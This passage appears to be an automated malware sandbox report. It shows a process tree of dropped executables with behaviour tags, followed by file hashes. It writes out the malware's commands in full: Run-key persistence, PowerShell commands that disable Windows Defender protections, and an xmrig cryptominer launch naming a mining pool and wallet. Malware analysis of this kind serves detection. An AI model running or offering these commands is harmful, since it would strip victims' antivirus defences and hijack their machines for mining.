- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 17962⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9AAB.exeC:\Users\Admin\AppData\Local\Temp\9AAB.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\EFC2.exeC:\Users\Admin\AppData\Local\Temp\EFC2.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\F437.exeC:\Users\Admin\AppData\Local\Temp\F437.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\F437.exe"C:\Users\Admin\AppData\Local\Temp\F437.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F437.exe"C:\Users\Admin\AppData\Local\Temp\F437.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F437.exe"C:\Users\Admin\AppData\Local\Temp\F437.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FB5C.exeC:\Users\Admin\AppData\Local\Temp\FB5C.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\FED8.exeC:\Users\Admin\AppData\Local\Temp\FED8.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe"C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "4⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&13⤵
-
C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe"C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 2523⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\56BD.exeC:\Users\Admin\AppData\Local\Temp\56BD.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com2⤵
-
C:\Users\Admin\AppData\Local\Temp\59BC.exeC:\Users\Admin\AppData\Local\Temp\59BC.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionExtension .exe -Force2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionExtension .exe -Force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
-
C:\Users\Admin\AppData\Roaming\xmrig.exe"C:\Users\Admin\AppData\Roaming\xmrig.exe" --cinit-find-x -B --log-file=SIDMQQV350R7LM24X7PSRJPPFXRYITGDNA7E2GM6V2ZUQN.txt --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=46N5zSuWXZxEL9R15g1BxDKTjKxqYJghY6BoGAF6TxkqJrpxeqyfWAqjawsQgUT3tx8PyTuZRdiL6CCAY5QAJqi9JGa6Rr9 --pass=XMR Miner --cpu-max-threads-hint=50 --cinit-stealth-targets="Wi4AbZOHTuCRnu5j9xZIAA==" --cinit-idle-wait=10 --cinit-idle-cpu=90 --cinit-stealth2⤵
-
C:\Windows\SysWOW64\cmd.exeCMD /C CALL echo y1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F437.exe.logMD5
461f0608537292fe791c6da4915da916
SHA1c1a6bd0947a5d3caf43beecf06dba8f3f7e3a713
SHA2568c261dd43dcd01d55cba35e1537e1a5f81f4cbc0793955ec8bdabc9b8735765e
SHA512e99236b37477d668f3aceaa212d271c0df30f60275987d88c9e9393e6f7f17e8d3ecd5043f1ac884767b966c594af5995e17490268d899b1a0c0b5ae7fd0529a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
e2c404ffba7b266e966ebef6d5a5a979
SHA1ef1e7f6cf1815fb7fae3b7831f463288cc2277fd
SHA25679e1dfe3ef487f9e1e676cd1d2cf91379c76e6f39a8fc08f2c3309212abaeb82
SHA5125a239caf95f6fd368d5e30d413c4d21fab72f9b42e61df61383af4d1a5dba64a7a16b8b84bf02b0cbc04f305f6bd6bdc5dc7028838df7de4c449d7a89f2742b6
-
C:\Users\Admin\AppData\Local\Temp\41BD.exeMD5
330314bc615bf94b4bb39ee2e864df0f
SHA1026ea1897175d9794866807170d2cdcf80975ef1
SHA2563efb716657ae07b2b4f46bfa772157f34ba5812d70a4f746060fa19079199108
SHA5121b31b84d2e69d2c9e3da395efbc0f94679e19f58e92a97b160fc8f3b57744d3d0c06c66524bc2a69975c4d3bc3dea089360f623be3a9f69660261e1255211c03
-
C:\Users\Admin\AppData\Local\Temp\41BD.exeMD5
330314bc615bf94b4bb39ee2e864df0f
SHA1026ea1897175d9794866807170d2cdcf80975ef1
SHA2563efb716657ae07b2b4f46bfa772157f34ba5812d70a4f746060fa19079199108
SHA5121b31b84d2e69d2c9e3da395efbc0f94679e19f58e92a97b160fc8f3b57744d3d0c06c66524bc2a69975c4d3bc3dea089360f623be3a9f69660261e1255211c03
-
C:\Users\Admin\AppData\Local\Temp\56BD.exeMD5
6d6fa1daff7b01f5a55a829c31c4f7a7
SHA1bf3fb6347c0ddcf164fc86f3d2c7fed29128146e
SHA2564354a498a6955bcd4944179ddb6ba94927022ab4c0eba0266b67911bf82a7b2e
SHA5128f57e8088e647f7f01a8e4d3643ed1df665182acb33198a80412dca8ff3706ed17718c2c837da9809c0f173088d9b7476989685a69c2cffa1c4eb273c45b28b6
-
C:\Users\Admin\AppData\Local\Temp\56BD.exeMD5
6d6fa1daff7b01f5a55a829c31c4f7a7
SHA1bf3fb6347c0ddcf164fc86f3d2c7fed29128146e
SHA2564354a498a6955bcd4944179ddb6ba94927022ab4c0eba0266b67911bf82a7b2e
